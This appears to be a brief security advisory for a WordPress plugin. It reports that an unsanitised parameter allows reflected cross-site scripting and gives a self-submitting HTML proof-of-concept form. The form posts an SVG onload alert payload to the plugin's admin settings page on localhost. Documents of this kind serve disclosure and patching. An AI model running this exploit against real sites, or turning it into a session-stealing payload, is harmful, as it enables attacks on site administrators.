The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected cross-Site Scripting
<form action="http://localhost/wp-admin/admin.php?page=donateextraSettings" method="post" name="form1">
<input type="text" name="notice" value='<svg/onload=alert(/xss/)>'>
<button type="submit"></button>
</form>
<script>
document.form1.submit();
</script>